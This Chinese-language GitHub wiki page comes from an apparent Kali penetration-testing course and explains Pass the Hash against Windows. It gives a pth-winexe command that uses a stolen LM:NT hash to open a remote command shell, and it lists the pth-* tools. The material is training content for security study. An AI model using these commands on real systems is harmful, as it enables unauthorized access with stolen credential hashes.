Skip to content

密文登录

不死鸟 edited this page Mar 23, 2018 · 1 revision

Pass the Hash (PTH)

仅支持windows

  • 密码破解耗费时间资源巨大
  • 使用密文提交给服务器直接完成身份认证
  • NTLM/LM是没有加盐的静态HASH密文
  • 企业中使用ghost等工具克隆安装系统, 可能直接控制全部
pth-winexe -U user%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd

pth-*有如下工具:
pth-curl 
pth-net 
pth-rpcclient  
pth-smbclient
pth-smbget
pth-sqsh  
pth-winexe
pth-wmic
pth-wmis 

WIKI 导航

前言
Kali介绍及安装
实验环境
基本工具
被动信息收集
主动信息收集
弱点扫描
缓冲区溢出
提权
无线热点攻击
Web渗透
密码破解
流量操作与隧道
拒绝服务
免杀
Metasploit
取证

﹊﹊﹊﹊﹊﹊﹊﹊﹊﹊
This wiki is created by [amWiki]

Clone this wiki locally